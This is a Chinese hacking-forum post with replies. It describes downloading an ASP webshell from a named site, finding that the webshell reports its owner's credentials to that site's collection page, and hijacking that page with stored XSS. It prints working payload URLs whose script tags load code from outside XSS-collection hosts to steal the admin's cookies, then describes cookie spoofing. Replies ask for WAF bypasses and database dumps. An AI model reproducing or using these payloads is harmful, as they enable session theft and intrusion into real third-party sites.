巧妙利用XSS日下Webshell后门箱子
这篇文章是我首发法客论坛的,今天有人要,我就在转回来好久没有日站了,前几天刚刚换了一台电脑。用起来实在喜欢。
好了开始吧。
经常会发现自己没有带asp什么木马带。会百度一下,然后随便下载一个用一下。
Mumaasp.com
我随便下载了一个,才知道这个是一个大箱子。
各种淫荡带想法开始了。
下载一个木马。在本地架设。网址嗅探看下都是什么东西。
http://www.mumaasp.com/xz/sx.asp?u=localhost/mumaasp.asp&p=mumaasp.com
这个localhost/mumaasp.asp不是我带木马连接吗?
mumaasp.com不是木马的密码嘛。
一下子,我大概知道了。
我们构造一下,在密码部分插入xss
http://www.mumaasp.com/xz/sx.asp?u=localhost/mumaasp.asp&p=mumaasp.com<script src="http://ciare.sinaapp.com/?u=3352cb"></script>
在浏览器直接回车打开,构造进去。
纳尼,死狗。不怕,我有打狗棒法。
又出现这个问题。字段太小而不能接受所要添加的数据的数量。试着插入或粘贴较少的数据。
那我们缩短下xss代码试试
http://www.mumaasp.com/xz/sx.asp?u=localhost/mumaasp.asp&p=mm<script src="http://x.co/15Flj"></script>
显示的是白色页面。难道差进去了嘛?耐心等一下。
到下午。没过多久。邮箱就开始提示来快递了。
上cookie欺骗
仅供参考~~
你是说他接受shell的是后台?而不是单个允许访问的页面? 按照国际惯例 箱子是要发出来的 不然会被轮的 这个方法好,我也去试试 求过狗神器 求裤子啊 U神V5 发表于 2014-5-4 19:28
你是说他接受shell的是后台?而不是单个允许访问的页面?
接受shell的是一个页面,但是访问箱子的是一个后台 感谢分享 老狗到是好弄,那新狗怎么搞?
页:
[1]
2